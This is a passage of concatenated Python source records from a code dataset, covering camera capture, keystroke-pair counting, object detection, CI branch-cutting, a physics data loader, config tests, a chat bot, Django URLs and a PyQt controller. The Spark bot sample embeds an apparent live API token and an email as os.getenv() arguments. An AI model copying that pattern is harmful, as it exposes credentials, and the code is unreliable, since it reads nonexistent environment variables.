now.strftime(\"%d/%m/%Y, %H:%M:%S\")\n print('motion detected at: ', string_time)\n os.system('scp /home/pi/Desktop/motion.jpg ed@178.79.168.149:/home/ed/imgs/motion/motion.jpg')\n sleep(10)\n print('monitoring', string_time)\n cycle += 1\nexcept KeyboardInterrupt:\n print('end')\n camera.close()\n","sub_path":"imgCap.py","file_name":"imgCap.py","file_ext":"py","file_size_in_byte":2115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"488135844","text":"import sys\n\npath = sys.argv[1]\nnew_path = sys.argv[2]\n\narq = open(path, \"r\")\n\nsep = \"\\t\"\n\nheader = arq.readline()\nlines = arq.readlines()\narq.close()\n\ndict_keydown_line = {}\n\nfor line in lines:\n\tline_split = line.replace(\"\\n\", \"\").split(\"\\t\")\n\tkeyDown = line_split[4]\n\tdict_keydown_line[keyDown] = line\n\nsorted_keydown = dict_keydown_line.keys()\n\nsorted_keydown.sort()\n\npair_data = {}\n\nlast_line = lines[0].replace(\"\\n\", \"\").split(\"\\t\")\n\nfor line in lines[1:]:\n\tline_split = line.replace(\"\\n\", \"\").split(\"\\t\")\n\t#print line_split\n\tattempt_id = line_split[0]\n\temail = line_split[1]\n\tattempt_date = line_split[2]\n\tsource = line_split[3]\n\tkeyDown = line_split[4]\n\tkeyUp = line_split[5]\n\tkeyValue = line_split[6]\n\tkeyCode = line_split[7]\n\n\t\n\tlast_keyValue = last_line[6]\n\tlast_attempt_id = last_line[0]\n\tlast_source = last_line[3]\n\n\t#check if the the two consecutive keys are in the same session and the same text field\n\tif( (last_attempt_id == attempt_id) and (last_source == source) ):\n\t\t\n\t\tif( not (last_keyValue, keyValue) in pair_data.keys()):\n\t\t\tpair_data[(last_keyValue, keyValue)] = 1\n\t\telse:\n\t\t\tpair_data[(last_keyValue, keyValue)] = pair_data[(last_keyValue, keyValue)] + 1\n\n\tlast_line = line_split\n\narq = open(new_path, \"w\")\n\narq.write(\"key_1st\" + sep + \"key_2nd\" + sep + \"occurrence\\n\")\n\nfor i in pair_data.keys():\n\tarq.write(i[0] + sep + i[1] + sep + str(pair_data[i]) + 
\"\\n\")\n\narq.close()","sub_path":"analysis/preprocessing/common_letter_pairs.py","file_name":"common_letter_pairs.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"486405876","text":"import jetson.inference\nimport jetson.utils\n\nnet = jetson.inference.detectNet(\"ssd-mobilenet-v2\", threshold=0.5)\ncamera = jetson.utils.videoSource(\"csi://0\")\ndisplay = jetson.utils.videoOutput(\"display://0\")\n\nwhile display.IsStreaming():\n\timg= camera.Capture()\n\tdetections = net.Detect(img)\n\tdisplay.Render(img)\n\tdisplay.SetStatus(\"Object Detection | Networks{:.0f} FPS\".format(net.GetNetworkFPS()))\n\t","sub_path":"Eye Tracking /Code/Resources/my-detection.py","file_name":"my-detection.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"366314998","text":"# SPDX-License-Identifier: EPL-1.0\n##############################################################################\n# Copyright (c) 2020 Thanh Ha\n#\n# All rights reserved. This program and the accompanying materials\n# are made available under the terms of the Eclipse Public License v1.0\n# which accompanies this distribution, and is available at\n# http://www.eclipse.org/legal/epl-v10.html\n#\n##############################################################################\n\"\"\"Script for cutting new jobs when branching a new stable release.\"\"\"\n\nimport argparse\nfrom argparse import RawTextHelpFormatter\nimport copy\nimport fileinput\nimport os\nimport shutil\nimport sys\n\ntry:\n import ruamel.yaml\nexcept ModuleNotFoundError:\n print(\"ERROR: This script requires the package 'ruamel.yaml', please install it.\")\n print(\n \"If ruamel.yaml is not available in your system's package manager you\"\n \" can install from PyPi with:\"\n )\n print(\"\")\n print(\" pip install --user ruamel.yaml\")\n sys.exit(1)\n\nyaml = ruamel.yaml.YAML()\nyaml.allow_duplicate_keys = True\nyaml.preserve_quotes = True\n\ndefault_branch = \"master\" # This is the primary dev branch of the project\n\n\ndef create_and_update_project_jobs(\n release_on_stable_branch, release_on_current_branch, job_dir\n):\n \"\"\"Create and update project build jobs for the current and next dev release.\n\n Project jobs are jobs defined in the project.yaml that have the same name\n the directory they are in.\n\n Only updates projects where the top project configuration has a name that\n is equivalent to the current release. 
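A matching project gets a new job block for the next development release (pointed at the default branch), and its existing block is re-pointed at the new stable branch. 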
For example project name\n \"aaa-sulfur\" would have a release that matches what was passed to\n release_on_stable_branch.\n \"\"\"\n for directory in filter(\n lambda x: os.path.isdir(os.path.join(job_dir, x)), os.listdir(job_dir)\n ):\n try:\n with open(\n os.path.join(job_dir, directory, \"{}.yaml\".format(directory)), \"r\"\n ) as f:\n data = yaml.load(f)\n\n # Only create new jobs if the top level project name matches\n # release_on_stable_branch variable\n if not data[0][\"project\"][\"name\"] == \"{}-{}\".format(\n directory, release_on_stable_branch\n ):\n continue\n\n # Create a new job for the next release on the default_branch\n new_job = copy.deepcopy(data[0])\n new_job[\"project\"][\"name\"] = \"{}-{}\".format(\n directory, release_on_current_branch\n )\n new_job[\"project\"][\"branch\"] = default_branch\n new_job[\"project\"][\"stream\"] = \"{}\".format(release_on_current_branch)\n\n # Update exiting job for the new stable branch\n data[0][\"project\"][\"branch\"] = \"stable/{}\".format(\n release_on_stable_branch\n )\n\n data.insert(0, new_job)\n\n with open(\n os.path.join(job_dir, directory, \"{}.yaml\".format(directory)), \"w\"\n ) as f:\n stream = ruamel.yaml.round_trip_dump(data)\n f.write(\"---\\n\")\n f.write(stream)\n except FileNotFoundError: # If project.yaml file does not exist we can skip\n pass\n\n\ndef update_job_streams(release_on_stable_branch, release_on_current_branch, job_dir):\n \"\"\"Update projects that have a stream variable that is a list.\n\n If a stream variable is a list that means the project likely has multiple\n maintainance branches supported.\n\n This function also does not support {project}.yaml files as parsing those\n are handled by other functions in this script.\n\n Only updates projects where the top stream in the list is equivalent to the\n current release. 
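When a project matches, a copy of its top stream is prepended for the next development release and the original stream's branch is switched to the new stable branch. 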
For example stream \"sulfur\" would have a release that\n matches what was passed to release_on_stable_branch.\n \"\"\"\n for directory in filter(\n lambda d: os.path.isdir(os.path.join(job_dir, d)), os.listdir(job_dir)\n ):\n for job_file in filter(\n lambda f: os.path.isfile(os.path.join(job_dir, directory, f)),\n os.listdir(os.path.join(job_dir, directory)),\n ):\n\n # Projects may have non-yaml files in their repos so ignore them.\n if not job_file.endswith(\".yaml\"):\n continue\n\n # Ignore project.yaml files as they are not supported by this function.\n if job_file == \"{}.yaml\".format(directory):\n continue\n\n file_changed = False\n\n with open(os.path.join(job_dir, directory, job_file), \"r\") as f:\n data = yaml.load(f)\n\n for project in data:\n streams = project.get(\"project\", {}).get(\"stream\", None)\n\n if not isinstance(streams, list): # We only support lists streams\n continue\n\n # Skip if the stream does not match\n # release_on_stable_branch in the first item\n if not streams[0].get(release_on_stable_branch, None):\n continue\n\n # Create the next release stream\n new_stream = {}\n new_stream[release_on_current_branch] = copy.deepcopy(\n streams[0].get(release_on_stable_branch)\n )\n\n # Update the previous release stream branch to\n # stable/{stream} instead of default_branch\n streams[0][release_on_stable_branch][\"branch\"] = \"stable/{}\".format(\n release_on_stable_branch\n )\n\n streams.insert(0, new_stream)\n file_changed = True\n\n # Because we are looping every file we only want to save if we made changes.\n if file_changed:\n with open(os.path.join(job_dir, directory, job_file), \"w\") as f:\n stream = ruamel.yaml.round_trip_dump(data)\n f.write(\"---\\n\")\n f.write(stream)\n\n\ndef update_integration_csit_list(\n release_on_stable_branch, release_on_current_branch, job_dir\n):\n \"\"\"Update csit-*-list variables and files integration-test-jobs.yaml.\"\"\"\n\n class Generic:\n def __init__(self, tag, value, style=None):\n self._value = value\n self._tag = tag\n self._style = style\n\n class GenericScalar(Generic):\n @classmethod\n def to_yaml(self, representer, node):\n return representer.represent_scalar(node._tag, node._value)\n\n @staticmethod\n def construct(constructor, node):\n return constructor.construct_scalar(node)\n\n def default_constructor(constructor, tag_suffix, node):\n generic = {ruamel.yaml.ScalarNode: GenericScalar,}.get( # noqa\n type(node)\n )\n if generic is None:\n raise NotImplementedError(\"Node: \" + str(type(node)))\n style = getattr(node, \"style\", None)\n instance = generic.__new__(generic)\n yield instance\n state = generic.construct(constructor, node)\n instance.__init__(tag_suffix, state, style=style)\n\n ruamel.yaml.add_multi_constructor(\n \"\", default_constructor, Loader=ruamel.yaml.SafeLoader\n )\n yaml.register_class(GenericScalar)\n\n integration_test_jobs_yaml = os.path.join(\n job_dir, \"integration\", \"integration-test-jobs.yaml\"\n )\n\n with open(integration_test_jobs_yaml, \"r\") as f:\n data = yaml.load(f)\n\n for project in data:\n # Skip items that are not of \"project\" type\n if not project.get(\"project\"):\n continue\n\n streams = project.get(\"project\", {}).get(\"stream\", None)\n\n # Skip projects that do not have a stream configured\n if not isinstance(streams, list): # We only support lists streams\n continue\n\n # Skip if the stream does not match\n # release_on_current_branch in the first item\n if not streams[0].get(release_on_current_branch, None):\n continue\n\n # Update csit-list parameters 
for next release\n if streams[0][release_on_current_branch].get(\"csit-list\"):\n update_stream = streams[0][release_on_current_branch]\n update_stream[\"csit-list\"] = GenericScalar(\n \"!include:\", \"csit-jobs-{}.lst\".format(release_on_current_branch)\n )\n\n # Update csit-mri-list parameters for next release\n if streams[0][release_on_current_branch].get(\"csit-mri-list\"):\n update_stream = streams[0][release_on_current_branch]\n update_stream[\"csit-mri-list\"] = \"{{csit-mri-list-{}}}\".format(\n release_on_current_branch\n )\n\n # Update csit-weekly-list parameters for next release\n if streams[0][release_on_current_branch].get(\"csit-weekly-list\"):\n update_stream = streams[0][release_on_current_branch]\n update_stream[\"csit-weekly-list\"] = \"{{csit-weekly-list-{}}}\".format(\n release_on_current_branch\n )\n\n # Update csit-sanity-list parameters for next release\n if streams[0][release_on_current_branch].get(\"csit-sanity-list\"):\n update_stream = streams[0][release_on_current_branch]\n update_stream[\"csit-sanity-list\"] = \"{{csit-sanity-list-{}}}\".format(\n release_on_current_branch\n )\n\n with open(integration_test_jobs_yaml, \"w\") as f:\n stream = ruamel.yaml.round_trip_dump(data)\n f.write(\"---\\n\")\n f.write(stream)\n\n # Update the csit-*-list variables in defaults.yaml\n\n defaults_yaml = os.path.join(job_dir, \"defaults.yaml\")\n\n with open(defaults_yaml, \"r\") as f:\n data = yaml.load(f)\n\n # Add next release csit-mri-list-RELEASE\n new_csit_mri_list = copy.deepcopy(\n data[0][\"defaults\"].get(\"csit-mri-list-{}\".format(release_on_stable_branch))\n )\n data[0][\"defaults\"][\n \"csit-mri-list-{}\".format(release_on_current_branch)\n ] = new_csit_mri_list.replace(\n release_on_stable_branch, release_on_current_branch\n )\n\n # Add next release csit-mri-list-RELEASE\n new_csit_mri_list = copy.deepcopy(\n data[0][\"defaults\"].get(\"csit-mri-list-{}\".format(release_on_stable_branch))\n )\n data[0][\"defaults\"][\n \"csit-mri-list-{}\".format(release_on_current_branch)\n ] = new_csit_mri_list.replace(\n release_on_stable_branch, release_on_current_branch\n )\n\n # Add next release csit-weekly-list-RELEASE\n new_csit_mri_list = copy.deepcopy(\n data[0][\"defaults\"].get(\n \"csit-weekly-list-{}\".format(release_on_stable_branch)\n )\n )\n data[0][\"defaults\"][\n \"csit-weekly-list-{}\".format(release_on_current_branch)\n ] = new_csit_mri_list.replace(\n release_on_stable_branch, release_on_current_branch\n )\n\n # Add next release csit-sanity-list-RELEASE\n new_csit_mri_list = copy.deepcopy(\n data[0][\"defaults\"].get(\n \"csit-sanity-list-{}\".format(release_on_stable_branch)\n )\n )\n data[0][\"defaults\"][\n \"csit-sanity-list-{}\".format(release_on_current_branch)\n ] = new_csit_mri_list.replace(\n release_on_stable_branch, release_on_current_branch\n )\n\n with open(defaults_yaml, \"w\") as f:\n stream = ruamel.yaml.round_trip_dump(data)\n f.write(\"---\\n\")\n f.write(stream)\n\n # Handle copying and updating the csit-*.lst files\n csit_file = \"csit-jobs-{}.lst\".format(release_on_stable_branch)\n src = os.path.join(job_dir, \"integration\", csit_file)\n dest = os.path.join(\n job_dir,\n \"integration\",\n csit_file.replace(release_on_stable_branch, release_on_current_branch),\n )\n shutil.copyfile(src, dest)\n with fileinput.FileInput(dest, inplace=True) as file:\n for line in file:\n print(\n line.replace(release_on_stable_branch, release_on_current_branch),\n end=\"\",\n )\n\n\nparser = argparse.ArgumentParser(\n description=\"\"\"Creates & 
with fileinput.FileInput(dest, inplace=True) as file:\n        for line in file:\n            print(\n                line.replace(release_on_stable_branch, release_on_current_branch),\n                end=\"\",\n            )\n\n\nparser = argparse.ArgumentParser(\n    description=\"\"\"Creates & updates jobs for ODL projects when branch cutting.\n\n    Example usage: python scripts/cut-branch-jobs.py Phosphorus Sulfur jjb/\n\n    ** If calling from tox the JOB_DIR is auto-detected so only pass the current\n    and next release stream name. **\n    \"\"\",\n    formatter_class=RawTextHelpFormatter,\n)\nparser.add_argument(\n    \"release_on_stable_branch\",\n    metavar=\"RELEASE_ON_STABLE_BRANCH\",\n    type=str,\n    help=\"The ODL release codename for the stable branch that was cut.\",\n)\nparser.add_argument(\n    \"release_on_current_branch\",\n    metavar=\"RELEASE_ON_CURRENT_BRANCH\",\n    type=str,\n    help=\"\"\"The ODL release codename for the new {}\n    (e.g. Sulfur, Phosphorus).\"\"\".format(\n        default_branch\n    ),\n)\nparser.add_argument(\n    \"job_dir\",\n    metavar=\"JOB_DIR\",\n    type=str,\n    help=\"Path to the directory containing JJB config.\",\n)\nargs = parser.parse_args()\n\n# We only handle lower release codenames\nrelease_on_stable_branch = args.release_on_stable_branch.lower()\nrelease_on_current_branch = args.release_on_current_branch.lower()\n\ncreate_and_update_project_jobs(\n    release_on_stable_branch, release_on_current_branch, args.job_dir\n)\nupdate_job_streams(release_on_stable_branch, release_on_current_branch, args.job_dir)\nupdate_integration_csit_list(\n    release_on_stable_branch, release_on_current_branch, args.job_dir\n)\n","sub_path":"scripts/cut-branch-jobs.py","file_name":"cut-branch-jobs.py","file_ext":"py","file_size_in_byte":13801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}{"seq_id":"86117143","text":"\"\"\"TrackML dataset loading\"\"\"\n\n__authors__ = ['Moritz Kiehn', 'Sabrina Amrouche']\n\nimport glob\nimport os.path\nimport re\n\nimport numpy\n\nDTYPE_HITS = numpy.dtype([\n    ('hit_id', 'i8'),\n    ('volume_id', 'i4'),\n    ('layer_id', 'i4'),\n    ('module_id', 'i4'),\n    ('x', 'f4'),\n    ('y', 'f4'),\n    ('z','f4'),\n    ('ex', 'f4'),\n    ('ey', 'f4'),\n    ('ez','f4'),\n    ('phi', 'f4'),\n    ('theta', 'f4'),\n    ('ephi', 'f4'),\n    ('etheta', 'f4'),\n    ('ncells', 'i4'), ])\nDTYPE_PARTICLES = numpy.dtype([\n    ('particle_id', 'i8'),\n    ('vx', 'f4'),\n    ('vy', 'f4'),\n    ('vz', 'f4'),\n    ('px', 'f4'),\n    ('py', 'f4'),\n    ('pz', 'f4'),\n    ('q', 'i4') ])\nDTYPE_MAPPING = numpy.dtype([('hit_id', 'i8'), ('particle_id', 'i8')])\n\ndef load_event(prefix):\n    \"\"\"\n    Load the full data for a single event with the given prefix.\n    Returns a tuple (hits, particles, truth) where particles and truth\n    can be None. 
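A typical call looks like: hits, particles, truth = load_event('path/to/event000001000'). 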
Each element is a numpy structured array with field names\n    identical to the CSV column names and appropriate types.\n    All output arrays are sorted first by hit_id and then by particle_id.\n    \"\"\"\n    print(prefix)\n\n    file_hits= glob.glob(prefix+\"-hits.csv*\")\n    if len(file_hits)==0:\n        raise Exception(\"No file found matching hits.csv* with prefix:\"+prefix)\n    elif len(file_hits)>1:\n        raise Exception(\"More than one file found matching hits.csv* with prefix:\"+prefix)\n    else:\n        file_hits=file_hits[0]\n    hits = numpy.loadtxt(file_hits, dtype=DTYPE_HITS,\n                         delimiter=',', skiprows=1, usecols=list(range(15)))\n    hits.sort(order='hit_id')\n\n    file_particles= glob.glob(prefix+\"-particles.csv*\")\n    if len(file_particles)==0:\n        particles = None # missing particles file is not fatal\n        print(\"Warning : no file found matching particles.csv* with prefix:\"+prefix)\n    elif len(file_particles)>1:\n        raise Exception(\"More than one file found matching particles.csv* with prefix:\"+prefix)\n    else:\n        file_particles=file_particles[0]\n        particles = numpy.loadtxt(file_particles, dtype=DTYPE_PARTICLES,\n                              delimiter=',', skiprows=1)\n        particles.sort(order='particle_id')\n\n    file_truth = glob.glob(prefix+\"-truth.csv*\")\n    if len(file_truth)==0:\n        truth = None # missing truth file is not fatal\n        print(\"Warning : no file found matching truth.csv* with prefix:\"+prefix)\n    elif len(file_truth)>1:\n        raise Exception(\"More than one file found matching truth.csv* with prefix:\"+prefix)\n    else:\n        file_truth = file_truth[0]\n        truth = numpy.loadtxt(file_truth, dtype=DTYPE_MAPPING,\n                          delimiter=',', skiprows=1)\n        truth.sort(order=['hit_id', 'particle_id'])\n\n    return hits, particles, truth\n\ndef load_dataset(path):\n    \"\"\"\n    Provide an iterator over all events in a dataset directory.\n    For each event it returns a tuple (name, hits, particles, truth) where\n    particles and truth can be None.\n    \"\"\"\n    # each event must have a hits file\n    hits_files = glob.glob(os.path.join(path, 'event*-hits.csv*'))\n    for f in hits_files:\n        name = os.path.basename(f).split('-', maxsplit=1)[0]\n        data = (name,) + load_event(os.path.join(path, name))\n        yield data","sub_path":"exploratory/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":3257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}{"seq_id":"421883823","text":"#!/usr/bin/env python3\n#\n# Copyright 2018 - The Android Open Source Project\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport unittest\n\nfrom acts.config import entries\n\n\nclass ConfigEntryMetaValidatorTest(unittest.TestCase):\n    \"\"\"Tests the ConfigEntryMetas are all valid.\"\"\"\n\n    def test_config_entries_have_valid_cli_flags(self):\n        \"\"\"Tests that all config_entries have valid cli_flags.\"\"\"\n        for entry in entries.config_entries:\n            if entry.cli_flags is None:\n                continue\n            if type(entry.cli_flags) is not list:\n                self.fail('Entry %s has an invalid cli_flags argument. This '\n                          'value must be a string or list of strings.' 
% entry)\n            for cli_flag in entry.cli_flags:\n                if type(cli_flag) is not str:\n                    self.fail('Entry %s has an invalid cli_flags argument. '\n                              'Flag %s is of type %s, but must be a str.' %\n                              (entry, cli_flag, type(cli_flag)))\n\n    def test_config_entries_define_help(self):\n        \"\"\"Tests that all config_entries define a help function.\"\"\"\n        for entry in entries.config_entries:\n            if entry.help is None:\n                self.fail('Entry %s must define the help kwarg.' % entry)\n\n    def test_config_entries_env_variables_has_acts_config_key(self):\n        \"\"\"Tests that all env var configs have a corresponding config key.\"\"\"\n        for entry in entries.config_entries:\n            if entry.env_var_name is not None and entry.acts_config_key is None:\n                self.fail('Entry %s defines env_var_name %s, but does not '\n                          'define a corresponding acts_config_key value. In '\n                          'order to access this config value during tests, '\n                          'this value must be specified.'\n                          % (entry, entry.env_var_name))\n\n    def test_config_no_conflicting_acts_config_keys(self):\n        \"\"\"Tests that all config_entries have unique ACTS config keys.\n\n        This will prevent values from overwriting each other.\n        \"\"\"\n        config_entries = entries.config_entries\n        uniques = {entry.acts_config_key for entry in config_entries}\n        if len(uniques) != len(config_entries):\n            keys_list = [entry.acts_config_key for entry in config_entries]\n            for key in uniques:\n                keys_list.remove(key)\n\n            self.fail('The following acts_config_keys are used at least '\n                      'twice: %s. Duplicate acts_config_keys can cause values '\n                      'to be overwritten, resulting in lost data.'\n                      % set(keys_list))\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n","sub_path":"framework/tests/config/entries_test.py","file_name":"entries_test.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}{"seq_id":"444671721","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSample code for using ciscosparkbot\n\"\"\"\n\nimport os\nfrom ciscosparkbot import SparkBot\n\n__author__ = \"scoutst\"\n__author_email__ = \"tungnx@dts.com.vn\"\n__copyright__ = \"Fork from Copyright (c) 2016 Cisco Systems, Inc.\"\n__license__ = \"Apache 2.0\"\n\n# Retrieve required details from environment variables\nbot_email = os.getenv(\"tungnx@dts.com.vn\")\nspark_token = os.getenv(\"Njk3M2UwOWItMjJmYi00MjY3LWFhZDEtMjA5YjQyMWEzYTQ3ZjE0NWZkMzItMDdi\")\nbot_url = os.getenv(\"scoutst.herokuapp.com\")\nbot_app_name = os.getenv(\"HerokuBot\")\n\ndef do_something(incoming_msg):\n    \"\"\"\n    Sample function to do some action.\n    :param incoming_msg: The incoming message object from Spark\n    :return: A text or markdown based reply\n    \"\"\"\n    return \"i did what you said - {}\".format(incoming_msg.text)\n\n# Create a new bot\nbot = SparkBot(bot_app_name, spark_bot_token=spark_token,\n               spark_bot_url=bot_url, spark_bot_email=bot_email, debug=True)\n\n# Add new command\nbot.add_command('/dosomething', 'help for do something', do_something)\n\n# Run Bot\nbot.run(host='0.0.0.0', port=5000)\n","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}{"seq_id":"630006137","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom DBEmulation.views import db_tree_view, index_view, reset, cache_node, cache_tree_view, \\\n    add_node, edit_node, delete_node, save_changes\nimport os\n\nsite_media = os.path.join(\n    os.path.dirname(__file__), 'site_media'\n)\n\nurlpatterns = [\n    
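# Development-only shortcut: in production the front-end web server, not Django, should serve site_media.\n    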
url(r'^site_media/(?P<path>.*)$', 'django.views.static.serve', {'document_root': site_media}),\n    url(r'^admin/', include(admin.site.urls)),\n    url(r'^db_tree/$', db_tree_view),\n    url(r'^cache_tree/$', cache_tree_view),\n    url(r'^cache_node/$', cache_node),\n    url(r'^add/$', add_node),\n    url(r'^edit/$', edit_node),\n    url(r'^delete/$', delete_node),\n    url(r'^save/$', save_changes),\n    url(r'^db_reset/$', reset),\n    url(r'^$', index_view),\n]\n","sub_path":"QSTest/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}{"seq_id":"523517595","text":"import os\nimport webbrowser\n\nfrom PyQt5.QtCore import pyqtSlot, QObject\nfrom PyQt5.QtWidgets import QMessageBox, QFileDialog\n\nfrom model import hull_and_spline, hulls, plot_time\nfrom model.file_manager import create_directory, get_file_name_from_absolute_path, \\\n    add_profile_used, get_coord\nfrom view.curves_dialog import CurvesDialog\nfrom view.model_generator_dialog import ModelGeneratorDialog\nfrom view.new_profile_dialog import NewProfileDialog\n\nfrom const import *\n\nDEBUG = False\n\n\nclass MyWindowController(QObject):\n    \"\"\"\n    This class is used to define all the logic behind my_window.py GUI\n    Here you will find all button handlers\n    \"\"\"\n\n    def __init__(self, view):\n        \"\"\"\n        Function used to create the controller and init each attribute\n        :param view: the corresponding view (here acquisition.py)\n        \"\"\"\n        super(MyWindowController, self).__init__()\n\n        # ATTRIBUTES\n        self.view = view\n        self.directory_path = \"\"\n        self.first_name = \"Prénom\"\n        self.last_name = \"Nom\"\n        self.age = \"âge\"\n        \n        # MODELS\n        self.path_model_hulls = \"\"\n        self.path_model_hull_and_spline = \"\"\n        self.path_model_wavelet = \"\"\n\n    @pyqtSlot(name=\"new_profile_menu_handler\")\n    def new_profile_menu_handler(self):\n        \"\"\"\n        Handler called when the new profile menu is triggered\n        It opens a new_profile_dialog.py to allow the user to fill in first name, last name and age\n        If the same profile (same firstname, lastname, age) already exists, it displays a pop-up\n        If everything is OK, it automagically updates the UI according to the selected profile\n        :return: Nothing\n        \"\"\"\n        self.first_name, self.last_name, self.age, accepted = NewProfileDialog.get_info()\n\n        if accepted:\n            DEBUG and print(\"=== my_window_controller.py === User info : \\n \" +\n                            \"FIRST NAME \" + self.first_name + \"\\n\" +\n                            \"LAST NAME \" + self.last_name + \"\\n\" +\n                            \"AGE \" + self.age)\n            try:\n                self.directory_path = create_directory(self.last_name.lower() + \"_\" + self.first_name.lower() +\n                                                       \"_\" + self.age)\n                # Update label value\n                self.view.update_ui(True, self.first_name, self.last_name, self.age)\n\n                DEBUG and print(\"=== my_window_controller.py === DIRECTORY CREATED AT: \" + self.directory_path)\n\n            except OSError:\n                DEBUG and print(\"=== my_window_controller.py === DIRECTORY ALREADY EXIST AT: \" + self.directory_path)\n                msg = QMessageBox()\n                msg.setIcon(QMessageBox.Critical)\n                msg.setText(\"Dossier déjà existant\")\n                msg.setInformativeText(\"Le patient que vous avez voulu créé existe déjà, veuillez changer de nom\")\n                msg.setWindowTitle(\"Erreur\")\n                msg.exec()\n\n        else:\n            DEBUG and print(\"=== my_window_controller.py === OPERATION CANCELED\")\n\n    @pyqtSlot(name=\"load_profile_menu_handler\")\n    def load_profile_menu_handler(self):\n        \"\"\"\n        Handler called when the load profile menu is triggered\n        It opens a browse directory dialog and allows the user to select a 
directory\n        If the directory selected is already opened in the GUI, it displays a pop up and does not open it again\n        If everything is ok, it automagically updates the UI according to the selected profile\n        :return: Nothing\n        \"\"\"\n        new_path = str(QFileDialog.getExistingDirectory(self.view, \"Sélectionner un dossier\",\n                                                        PATH_TO_STORE_FILES, QFileDialog.ShowDirsOnly))\n        # If the user canceled\n        if not new_path:\n            return\n\n        old_directory_name = get_file_name_from_absolute_path(self.directory_path).strip(\"\\n\")\n        new_directory_name = get_file_name_from_absolute_path(new_path).strip(\"\\n\")\n\n        # If the user tries to load the same profile as before\n        if old_directory_name != new_directory_name:\n            self.directory_path = new_path\n        else:\n            msg = QMessageBox()\n            msg.setIcon(QMessageBox.Information)\n            msg.setText(\"Profil inchangé\")\n            msg.setInformativeText(\"Le profil que vous avez chargé est déjà chargé dans l'application\")\n            msg.setWindowTitle(\"Information\")\n            msg.exec()\n            return\n\n        DEBUG and print(\"=== acquisition.py === FOLDER LOADED : \" + self.directory_path)\n\n        directory_name = get_file_name_from_absolute_path(self.directory_path)\n\n        try:\n            [self.last_name, self.first_name, self.age] = directory_name.split(\"_\")\n\n            # Add profile to \"last_profile_used\" file\n            add_profile_used(directory_name)\n\n            self.view.update_ui(True, self.first_name, self.last_name, self.age)\n\n            DEBUG and print(\"=== acquisition.py === User info : \\n \" +\n                            \"FIRST NAME \" + self.first_name + \"\\n\" +\n                            \"LAST NAME \" + self.last_name + \"\\n\" +\n                            \"AGE \" + self.age)\n\n        except ValueError:\n            # DISPLAY POP UP ERROR AND DO NOTHING\n            DEBUG and print(\"=== acquisition.py === INCORRECT FOLDER NAME\")\n            msg = QMessageBox()\n            msg.setIcon(QMessageBox.Critical)\n            msg.setText(\"Format de dossier incorrect\")\n            msg.setInformativeText(\"Le dossier que vous avez sélectionné ne suit pas la convention qui est : \"\n                                   \"Nom_prénom_age\")\n            msg.setWindowTitle(\"Erreur\")\n            msg.exec()\n            return\n\n    @pyqtSlot(name=\"load_last_profile_used\")\n    def load_last_profile_used(self):\n        \"\"\"\n        Handler called when a profile is loaded from the last profile used list\n        It automagically updates the UI according to the selected profile\n        :return: Nothing\n        \"\"\"\n        sending_button = self.view.sender()\n        text_button = sending_button.text()\n\n        try:\n            [new_last_name, new_first_name, new_age] = text_button.split(\" \")\n            if new_last_name == self.last_name and new_first_name == self.first_name and \\\n                    new_age.strip(\"\\n\") == self.age.strip(\"\\n\"):\n                msg = QMessageBox()\n                msg.setIcon(QMessageBox.Information)\n                msg.setText(\"Profil inchangé\")\n                msg.setInformativeText(\"Le profil récent que vous avez chargé est déjà chargé dans l'application\")\n                msg.setWindowTitle(\"Information\")\n                msg.exec()\n                return\n            else:\n                [self.last_name, self.first_name, self.age] = [new_last_name, new_first_name, new_age]\n                add_profile_used(self.last_name + \"_\" + self.first_name + \"_\" + self.age.strip(\"\\n\"))\n                self.directory_path = os.path.abspath(PATH_TO_STORE_FILES + text_button.replace(\" \", \"_\")).strip(\"\\n\")\n                self.view.update_ui(True, self.first_name, self.last_name, self.age)\n\n        except ValueError:\n            # DISPLAY POP UP ERROR AND DO NOTHING\n            DEBUG and print(\"=== acquisition.py === INCORRECT FOLDER NAME\")\n            msg = QMessageBox()\n            msg.setIcon(QMessageBox.Critical)\n            msg.setText(\"Format de dossier incorrect\")\n            msg.setInformativeText(\"Le profil récent que vous avez sélectionné n'est plus valide... 
\\n\"\n \"Veuillez en créer ou en sélectionner un autre \")\n msg.setWindowTitle(\"Erreur\")\n msg.exec()\n return\n\n @pyqtSlot(name=\"load_curves_menu_handler\")\n def load_curves_menu_handler(self):\n \"\"\"\n Handler called when the load curves menu is triggered\n It opens the curves_dialog.py and allow the user to select the curves he wants to display on the graph\n If the user confirm his operation, it updates the graph according to the selected curves\n Otherwise it does nothing\n :return: Nothing\n \"\"\"\n DEBUG and print('=== my_window_controller.py === LOAD CURVES: ' + self.directory_path)\n curves_on_graph, accepted = CurvesDialog.get_result(self.directory_path,\n self.view.tab_acquisition.get_curves_on_graph())\n DEBUG and print(\"=== my_window_controller.py === CURVES SELECTED \", str(curves_on_graph))\n # The user choose some curves\n if accepted:\n # Empty attributes and graph\n self.view.tab_acquisition.draw_curves(curves_on_graph, self.directory_path)\n\n if self.view.my_window_controller.one_model_loaded():\n acq_controller = self.view.tab_acquisition.acquisition_controller\n # 